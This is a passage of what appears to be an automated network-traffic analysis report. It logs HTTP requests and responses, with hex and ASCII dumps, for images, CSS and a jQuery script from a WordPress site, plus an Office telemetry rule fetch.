                                                                                                                      2024-12-03 07:55:29 UTC1338INData Raw: 6d 61 72 67 69 6e 3a 30 20 38 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 66 75 6c 6c 73 63 72 65 65 6e 2d 61 6c 74 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 6c 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 66 75 6c 6c 73 63 72 65 65 6e 20 2e 69 6e 6e 65 72 3e 64 69 76 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d
                                                                                                                      Data Ascii: margin:0 8px;transform:scale(0);-webkit-transform:scale(0)}#slide-out-widget-area.fullscreen-alt .off-canvas-social-links li{display:inline-block;transform:scale(0);-webkit-transform:scale(0)}#slide-out-widget-area.fullscreen .inner>div,#slide-out-widget-


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      140192.168.2.449902196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC382OUTGET /wp-content/uploads/2018/02/products2.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC262INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:11 GMT
                                                                                                                      ETag: "16f13-56723b58d35c0"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 93971
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:29 UTC7930INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 42 00 00 00 e3 08 02 00 00 00 7f f8 8a 34 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 6e b5 49 44 41 54 78 da 8c bd 49 8f 6c 49 76 26 66 c7 cc ee 75 f7 18 de 94 2f f3 65 65 56 b1 aa 58 2a 56 15 87 a2 8a c5 16 a8 42 b7 04 f6 04 a8 01 01 04 ba d1 80 d0 1b ed b4 d1 4e 3f 42 5b 6d 5a 02 04 48 1b 41 d2 46 10 04 41 ab 5e 10 10 9b 00 55 84 d4 24 9b 4d 89 c5 a1 58 53 ce 99 6f 88 17 11 ee 7e ef 35 3b b2 33 99 d9 f5 88 24 3b 99 cc 8a f7 22 c2 fd fa bd 76 a6 ef 7c e7 3b e0 be fa 0d 27 ff 00 d8 17 fc 5f 74 ed 1f e0 ef 46 d8 7a 1f 7c d8 7a 18 02 0c 1e 82 83 e0 1d 82 f3 0e 12 96 7f 5c f9 37 e5 3c a5 b4 4f f8 3a 65 37 27 b7 94 7f 17 87 d9 5e
                                                                                                                      Data Ascii: PNGIHDRB4tEXtSoftwareAdobe ImageReadyqe<nIDATxIlIv&fu/eeVX*VBN?B[mZHAFA^U$MXSo~5;3$;"v|;'_tFz|z\7<O:e7'^
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: dc 83 1c 1e a5 77 d2 71 d0 c0 c0 3a 24 35 21 30 9e 3b cf 52 e5 8e 40 2a f8 79 c5 98 c9 98 bd 4c 08 86 1a 29 54 99 2e f1 d8 5f 62 1e b7 36 f5 72 50 01 29 8e 7e 50 c1 4a d3 a5 a8 70 0b d6 2a a6 93 10 84 fb fd a9 74 69 98 c3 41 53 be 25 23 22 d4 7d c3 ad e3 18 a3 63 ca 62 e0 5e 2e a9 f6 00 91 31 c6 10 a3 35 66 d8 96 33 e7 8a 78 bb d0 bc c7 86 27 5a 32 0f 9c 86 ca 68 ee 94 61 0c 51 d6 01 63 9d e6 30 8e 53 6a 33 79 42 42 d3 a9 54 6f 65 14 7d 4c 1e ed 62 df a2 f9 b4 60 68 e5 46 12 fe cc 1d 33 23 99 d3 f3 65 4e 41 29 83 ab d8 81 e8 b3 35 be 50 1d 43 30 56 93 86 8b ac 1e 11 8d 0d 5d dd a8 96 3e ea 59 02 53 db ab be 4c 2e f1 77 61 04 2b 4f ec e0 96 4a bf 62 4a 4f 66 21 83 06 63 51 91 60 6a 3e 32 e8 90 9d b0 c6 8c 21 43 a2 47 55 80 84 d9 75 e4 81 16 ae a9 05 99 63
                                                                                                                      Data Ascii: wq:$5!0;R@*yL)T._b6rP)~PJp*tiAS%#"}cb^.15f3x'Z2haQc0Sj3yBBToe}Lb`hF3#eNA)5PC0V]>YSL.wa+OJbJOf!cQ`j>2!CGUuc
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 6c e2 eb d7 52 6b 50 be 49 8d 7d d6 d3 a3 69 b0 89 96 57 d7 d2 b7 a7 fe 40 2d 1b ab b6 61 db dd 83 7f 7d f2 7c a7 73 71 82 54 23 36 fa 47 5d aa b6 d2 ee c1 15 d5 71 b5 c6 a5 13 f4 e9 41 ec e8 df 20 9d 36 9d 64 e2 ff 9a 82 a4 dc 31 f6 1b c1 19 c5 d5 42 01 5a 0f 06 d6 5e 49 e5 7c 74 35 9f e3 a4 9a 03 60 b6 25 35 1a a7 51 ef 4e 36 68 de 2f ab 46 9a 5e 80 4f 00 fd 89 a6 2d 44 36 e8 10 ea 1c 5f e5 c6 59 49 ea ad 1a 49 dc d7 f7 d0 98 21 24 8e 1d 62 c9 70 0e c0 18 53 ce ba ea 47 35 e5 2a 51 bd 84 d6 84 58 6d 32 db bc 70 a5 92 83 8c 4f ad c5 a8 65 0b 41 3a 5d 10 a1 a4 b4 9e 4c ba de ff 62 bb 16 14 83 8f 6e bd 6a 4b 89 66 a1 df f0 51 c9 21 32 5f c1 56 5a 1e e6 a0 92 3a bc 08 98 5a 48 d2 48 90 c6 5f 93 60 28 e7 f7 f9 f5 ed 32 51 56 7c 79 b1 fd da 83 dd d3 11 9e 6e
                                                                                                                      Data Ascii: lRkPI}iW@-a}|sqT#6G]qA 6d1BZ^I|t5`%5QN6h/F^O-D6_YII!$bpSG5*QXm2pOeA:]LbnjKfQ!2_VZ:ZHH_`(2QV|yn
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 26 14 cb c1 7b b5 3e d1 c8 d4 75 4d a1 ca cc 97 64 1b fc 09 28 0b aa 70 a1 2a 50 d2 74 99 17 6c fe ed 74 ec 06 fb 7e 2a fb 8d 0c b6 64 5a 16 2f 18 94 8e dd 5a f6 b6 0c 82 3f 75 42 c1 ec a4 96 96 ba 94 f5 83 4a 71 76 98 e6 e7 07 1f 5e c1 7e 1b cf 37 f1 7c 1c 36 43 31 65 9a 3a 40 01 f1 64 de dc 68 68 89 c2 4b 3e 26 19 82 93 8c d8 99 8a 80 41 f4 a2 27 e0 57 12 82 d2 a8 8c 81 82 bc c0 5e e6 f1 c4 c7 59 8f 48 dd 1d 56 7c d5 f5 6a b9 7c d7 68 b1 98 77 be ca ac b6 03 83 cc f5 a0 09 3d 56 95 a5 01 7d 5e b5 4d a9 6b aa 80 10 d3 35 3f 7d 7d f3 d9 d5 cd 07 cf 5f dd dc 14 f3 0c 9f dc ee 3f 8e c3 0f 3f 7e fe b5 df fa d2 77 7e f9 3b df ff 97 bf fd dd ff f0 1f bc ff 87 bf e7 31 3d de 9c 0f c3 70 c0 78 75 35 8f cf de 39 7b f6 f6 2f fd fa f7 7e e9 bb df 7d f2 f8 f2 cf 7f
                                                                                                                      Data Ascii: &{>uMd(p*Ptlt~*dZ/Z?uBJqv^~7|6C1e:@dhhK>&A'W^YHV|j|hw=V}^Mk5?}}_??~w~;1=pxu59{/~}
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: bf b7 fb e0 38 49 17 9d bd 38 d9 7c f3 e1 61 d2 76 f3 e5 83 4b 3b db b3 85 db ae e6 c2 d6 e6 13 3b 5b 13 55 bb 2c 5b a3 24 9b 7b 77 57 f2 aa ae d3 59 b6 ac 9b bb b3 fa e0 f0 78 7b a8 37 86 e9 e2 a8 d9 9e 0c 6e ee cd 5c a5 fc d4 ce 70 7f 5e e5 a9 86 71 77 d3 64 43 f0 43 4e c1 da 06 25 16 b1 33 9a 67 0c 17 78 ea f2 25 d2 e0 b3 2a d4 a6 64 be 41 73 89 d0 a8 b6 96 4f 7a eb d1 7a 60 a4 dc ef ed 05 78 00 f5 6f 08 81 4b 30 3f ff b8 dc 4a ca 48 e8 59 da bc f4 06 51 76 d6 63 38 c1 c2 39 25 de 9b ac 93 93 ce 54 a2 b7 d2 ca 52 31 86 59 10 f5 41 bf 29 4a b0 f1 1d d3 94 34 ba 59 68 fa 51 c3 45 a9 c4 02 37 56 c6 bf 84 53 a3 53 c0 88 ec 9e 66 52 2d 7f 48 0f f9 a2 c3 d5 d0 f0 c6 8a 2a 3c c0 fc a1 f3 04 73 07 77 06 07 d9 24 db 27 3b 84 46 5b b0 3e 60 99 2f 97 80 b5 a8 bf
                                                                                                                      Data Ascii: 8I8|avK;;[U,[${wWYx{7n\p^qwdCCN%3gx%*dAsOzz`xoK0?JHYQvc89%TR1YA)J4YhQE7VSSfR-H*<sw$';F[>`/
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 5c 01 91 5b c6 c7 3f f4 dc 1b ef dd fe d3 d7 6f b8 67 e6 52 62 40 52 b8 93 b7 ae 5d a0 76 fb 71 6b 63 74 fd ea 15 55 d5 8b a3 c3 ba aa dd 96 2e 33 b5 51 66 03 9d 94 da b8 08 ec 62 f4 60 90 e7 d0 2c 4d 5d 6d bc 35 1a 76 18 00 6b 93 9c 2c ea 59 d3 fe d8 df ff 6f b6 1e bf 0a b2 4c 56 a6 e7 3e 4f 80 9a 15 30 05 1d bb dd c3 25 bf f2 da 7b 6f de 78 af a9 56 a9 f5 e8 55 5f 7c 41 98 45 23 7b ab ba 96 0a c2 e5 bc 79 e3 f6 31 96 62 1d 1d 97 cb d5 72 31 5f 8d c6 e5 e6 a8 24 8c 39 b2 9b d4 da a4 24 0c 93 4e 0b c8 8b 3f 48 d4 85 54 a2 02 f2 08 5d bb f7 53 02 41 59 ab 1e 67 3d 0d 1a ed 9a 29 b9 86 a5 79 e0 b8 d1 1d de a4 79 d5 4c dc e1 08 2e a3 8c 65 d0 51 17 9a 6d 1b b1 69 c9 cd 1a 19 2c d1 c2 4b c9 f1 b4 8f 8e 8a d2 66 eb 6d 89 79 aa 1c b2 01 43 ca d0 30 61 c0 db d6
                                                                                                                      Data Ascii: \[?ogRb@R]vqkctU.3Qfb`,M]m5vk,YoLV>O0%{oxVU_|AE#{y1br1_$9$N?HT]SAYg=)yyL.eQmi,KfmyC0a
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 19 d3 85 c0 0c 42 82 50 83 da 37 eb 22 98 ba 64 1d 1a e7 a8 8c 21 21 cd 1c 76 fb 82 4f f9 da 9d 87 bf f4 95 57 db d6 70 d9 64 70 40 91 a5 74 58 ba a5 e6 ae 74 e5 72 be ba be 7d f7 d6 cb 5f fc 9c 29 07 9f f8 d4 f7 9f bb 7a fd f0 e1 fd 72 bc 51 0c 5c 72 bd b3 b1 31 de d9 d9 04 95 0e 60 c3 a4 54 66 bb c3 2d 2f 07 6e 93 67 38 e2 3e 3e 3e d9 db dd 7b fb b5 d7 3e f6 c9 3f 33 1c 14 cb e5 fc e5 af 7e b5 9a ce 94 80 ab 95 84 3c 6a ab 40 87 19 14 8f 32 86 e1 75 1d cd 4b c0 4b 01 c5 cf 93 ae a5 66 75 62 5a e8 6f 11 e3 2d 21 da a7 77 9b 13 1c 14 31 db 29 ec b3 8a 9b 77 1f 8c bc cf c5 e1 27 76 17 50 12 53 54 d4 59 88 7c 13 24 2f 55 eb c0 87 fe 26 e6 ff 07 b9 79 57 14 b9 0a ea b9 4b 5b e7 26 e5 ad 7b c6 95 16 8d e1 67 e2 3e b2 d6 22 d4 d2 ef e8 92 ee 44 aa 04 43 ad 45
                                                                                                                      Data Ascii: BP7"d!!vOWpdp@tXtr}_)zrQ\r1`Tf-/ng8>>>{>?3~<j@2uKKfubZo-!w1)w'vPSTY|$/U&yWK[&{g>"DCE
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: db d5 09 44 7c 63 4f 22 5c b9 e4 c9 86 97 0b aa 6b 38 1e b0 56 6c 89 51 46 7a 60 52 fb 0f a2 42 cd c8 b0 16 e7 b6 7a 07 1c 8a fd 0c c4 fe 2a 99 cb 90 a1 ca e8 e5 e4 f8 e8 f1 d3 e9 98 8d 06 f7 e4 6d 09 ea 57 6b 71 9d be 38 fd e0 c9 d2 67 4e 42 f4 83 75 e0 c3 4b 92 6f f0 f3 1e 15 6a e6 28 c7 15 73 28 6f 63 42 47 18 4e 02 3c c3 a9 73 6b 8b 66 d9 31 bb 66 df 3e 2b b6 91 e4 ae a7 40 26 7a 6e 26 7e dd 23 a8 0f 11 d5 c6 6e 99 a1 93 21 e8 45 d5 78 27 c0 1e f6 6b d3 58 1c b1 18 bf 75 5c 30 9b f1 12 18 8c 96 c7 4c 58 13 7d d4 f5 ce c5 80 82 42 03 8d f6 7c b1 c6 6d 7c f4 9a b8 fb 35 71 f5 0b a3 8f fe 72 31 9b 0f 32 58 97 ae d5 b6 a6 c2 d5 35 16 87 9c 34 a0 b6 f1 a3 08 f9 92 fe bd 62 a2 0b f7 f5 3e 7e 3a fb df ff ea 67 03 a5 0f c6 07 57 ae bd 96 4c 76 13 5b 49 db c0
                                                                                                                      Data Ascii: D|cO"\k8VlQFz`RBz*mWkq8gNBuKoj(s(ocBGN<skf1f>+@&zn&~#n!Ex'kXu\0LX}B|m|5qr12X54b>~:gWLv[I
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 42 d2 98 e7 90 06 43 64 16 36 4f 36 49 da 28 72 34 84 55 0a 15 5a 55 50 e7 96 d5 b0 38 23 91 b4 d4 15 5b 52 f6 54 fe 98 81 e4 85 ca f0 be a9 54 6b 9c 60 0d 33 77 63 02 c9 f5 e8 e8 0b 77 ee dc b9 99 25 c9 f9 e9 c5 83 c7 4f 2f 16 eb 06 5b 44 e8 99 31 c8 b3 db 57 f7 af 1f 1d fd f9 fb 9f b1 a9 82 0b 18 f7 ae 39 24 e5 25 39 9a ce ad da 92 24 06 8e 37 1c 53 fc c8 ea 4b 79 c0 93 f2 21 0d 8f 25 d7 53 2e 65 dd 0c cc 8b 86 24 bb c5 7e 5f de e9 17 3b d0 52 c1 09 ea 9c 8b 22 4e 24 be 05 57 28 c9 86 23 82 a5 42 2d 82 ea 0e e5 a6 1c 8f 47 49 92 1c 3f 7e 48 d8 ad c4 d4 a5 88 16 7e 5e 96 c9 f9 21 b0 37 a4 c5 77 25 79 7a 11 1a d7 24 36 24 a3 c0 08 cb da 04 b9 65 06 7e f8 b9 b1 34 6e 6b a7 49 17 01 0f fd b1 dc 25 31 51 77 59 06 a4 4f 95 90 31 cd 71 11 a6 e5 b6 98 a0 62 1b
                                                                                                                      Data Ascii: BCd6O6I(r4UZUP8#[RTTk`3wcw%O/[D1W9$%9$7SKy!%S.e$~_;R"N$W(#B-GI?~H~^!7w%yz$6$e~4nkI%1QwYO1qb
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: a1 f4 53 31 55 23 70 d5 08 15 27 c8 ee d2 c0 96 00 27 ea 6f be f7 47 67 e7 a7 88 30 0d 1c 46 d6 1b 86 d8 8b 20 08 eb d1 49 2d dc 1b 96 01 20 03 54 ec e5 60 ed a3 4c 38 a9 61 17 0f 06 03 e9 7a 6c 41 9f 51 5f da 4b fd 24 3f e6 10 a8 f6 e4 a8 bb 41 3d 07 0d 75 36 fc 75 9e 16 ad 84 37 99 94 7e e6 1f 3c e5 1c d3 b3 95 f7 6a 74 7e 60 2f 7b 98 9c cb 9a 7a 1d 81 7f 9b 8a 18 33 87 2c 4d 63 0f 22 8e 9d 99 64 a3 22 49 23 0c d5 82 96 6e b0 50 44 71 44 45 36 bd 2e dc 4b 3a 03 85 ad d8 19 57 f3 a0 48 b3 b0 be d0 ca 45 94 33 a9 22 a8 c0 69 c3 cc 57 a1 4a 9c e2 c1 93 e9 35 92 78 84 cd 69 2f 46 4f 6a 85 3b e6 78 93 2c 70 12 ba 0d d2 2b a0 06 fd 15 9f 90 b0 fa 26 84 29 82 c3 63 c7 27 49 06 43 3e b4 14 b7 3b 3a db 8d d0 49 60 38 8e 8d 34 71 1b c4 36 09 49 4b 73 68 6e 86 41
                                                                                                                      Data Ascii: S1U#p''oGg0F I- T`L8azlAQ_K$?A=u6u7~<jt~`/{z3,Mc"d"I#nPDqDE6.K:WHE3"iWJ5xi/FOj;x,p+&)c'IC>;:I`84q6IKshnA


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      141192.168.2.449906196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC596OUTGET /wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=1.3 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC295INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:30 GMT
                                                                                                                      ETag: "958-5eed4eec63d80"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 2392
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:29 UTC2392INData Raw: 2f 2a 0a 2a 20 6a 51 75 65 72 79 20 45 61 73 69 6e 67 20 76 31 2e 34 2e 31 20 2d 20 68 74 74 70 3a 2f 2f 67 73 67 64 2e 63 6f 2e 75 6b 2f 73 61 6e 64 62 6f 78 2f 6a 71 75 65 72 79 2f 65 61 73 69 6e 67 2f 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 65 29 7d 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 6e 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72
                                                                                                                      Data Ascii: /** jQuery Easing v1.4.1 - http://gsgd.co.uk/sandbox/jquery/easing/*/!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?module.exports=n(require("jquer


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      142192.168.2.44990513.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:28 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 958
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                      x-ms-request-id: 87286592-701e-0053-7b27-443a0a000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075528Z-174f7845968frfdmhC1EWRxxbw00000015r0000000003qhx
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:28 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      143192.168.2.449907196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC382OUTGET /wp-content/uploads/2018/02/products3.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC263INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:29 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:12 GMT
                                                                                                                      ETag: "1ad41-56723b59c7800"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 109889
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:29 UTC7929INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 42 00 00 00 e3 08 02 00 00 00 7f f8 8a 34 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 ac e3 49 44 41 54 78 da 7c bd 49 ac 65 49 7a 1e 16 c3 99 ee f4 86 9c 2a 87 aa ea ea e6 d0 cd 6e 92 12 07 51 6c 4a 94 28 0b a2 41 10 10 2d 68 63 c3 a6 37 86 17 5e 78 67 c0 96 cd b5 36 06 04 7b 67 c0 80 0c c3 90 2d 18 5c d8 96 44 81 83 65 91 22 65 93 6d 0e ad 66 77 b3 bb 6b c8 1a b2 b2 72 78 d3 1d ce 1c 11 fe 87 88 38 71 6e 26 fd b2 2a 87 f7 ee 3d f7 9c 88 f8 e7 ef ff 7e f9 cd 8f 3f 51 d2 69 29 95 94 ce 39 61 f1 cb 38 67 ad 1b 9d 75 42 48 a9 95 52 42 0a 27 f1 4b c0 17 fd a6 1c fe 2e 1c 7e 85 3f e9 cb c2 bf f1 ed e1 7b f0 6f bc 7e 7c 05 bc 9f fe
                                                                                                                      Data Ascii: PNGIHDRB4tEXtSoftwareAdobe ImageReadyqe<IDATx|IeIz*nQlJ(A-hc7^xg6{g-\De"emfwkrx8qn&*=~?Qi)9a8guBHRB'K.~?{o~|
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 57 1b 0f 1b 85 50 09 1c 51 c4 86 50 f9 57 4e cd 25 5e ca 9c cf 8d 2b 24 dc 00 b5 0d 7e f5 32 cf eb ae 47 7c b5 93 1e bc 46 cb 65 d9 79 08 1d 22 1e 6f 2f b0 23 2a 63 4b 4f 7b ed fc d1 08 3d a8 ca e7 7e 89 4b 24 e2 60 5c dc 1c c5 88 99 d0 30 f1 9a aa bf 4c a1 3c 41 92 03 6a 9f f3 0b e9 d1 72 a9 12 e4 73 10 d3 30 ee 48 86 13 c8 41 b0 16 ec aa 68 d2 b6 a4 28 09 57 23 5c 84 70 05 3a 0b 6e a8 92 a5 ce ef 3c ba 0b e7 65 6b 9f 29 db 15 6e c8 6c 93 57 f9 66 b5 2e 2b 0c 77 d1 5b 46 71 c3 fa 25 d8 62 27 5b 81 21 31 75 bb 0e e4 db c1 e1 eb f0 35 64 8d c7 ac c8 b1 7e 91 95 4d 5b db ba 6d 6f 0e b6 ef 07 84 70 1a 52 ca 58 74 1f bb 6e 20 f0 56 86 e9 06 03 4b 30 da 41 72 2d 6a 1c b1 af 15 fb 7f 34 b7 7c 90 0a 75 62 ec ff f8 b7 7f fb 17 7e f9 97 ad 38 c6 4f 26 6e af 14 29
                                                                                                                      Data Ascii: WPQPWN%^+$~2G|Fey"o/#*cKO{=~K$`\0L<Ajrs0HAh(W#\p:n<ek)nlWf.+w[Fq%b'[!1u5d~M[mopRXtn VK0Ar-j4|ub~8O&n)
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 57 cf 9e 23 5a a0 aa ce ee de 85 1b 7f 70 ff de b3 67 2f 36 ab e5 cb a7 9f 82 d9 b9 79 f9 f4 b3 0f be 5b 3d fa 42 1c 02 67 9c 1e 68 26 05 4f 60 52 36 38 bc 24 6f 9c db 30 94 2d 14 7e 0c 67 3a 44 8f 9a ba 10 3d 84 7e 35 0e 8c 12 09 95 57 f0 a9 54 9c 15 36 ef 65 b1 49 37 4c a8 14 78 8f 9a 5a b3 e6 f4 4e 61 48 0c ef 88 09 88 e0 98 c1 49 06 2c bb 79 9c 16 c7 aa 39 6e a9 53 c1 ec 73 eb a2 f1 43 8f 50 f9 22 97 59 56 ca 7c 40 8a 06 24 08 c7 5f 3e 5b 47 78 29 38 49 11 bc c8 24 6d b0 a3 0e 9d 30 49 6f 40 75 0c d7 e9 03 08 cb 11 85 80 65 db 4b 04 48 3c 5a c8 26 81 22 3b a7 01 bd 84 11 b8 25 b9 e5 56 4a 0a be 11 9d 79 ba 29 bf 78 f7 36 f8 6e cf 9e 7e 76 79 f1 a2 39 d8 9a a9 9d 9c 7d f6 e4 f9 db 5f fe c2 d0 d4 4c 88 32 c5 98 29 da 8a 59 56 b9 cd c2 45 29 e7 22 9c b7
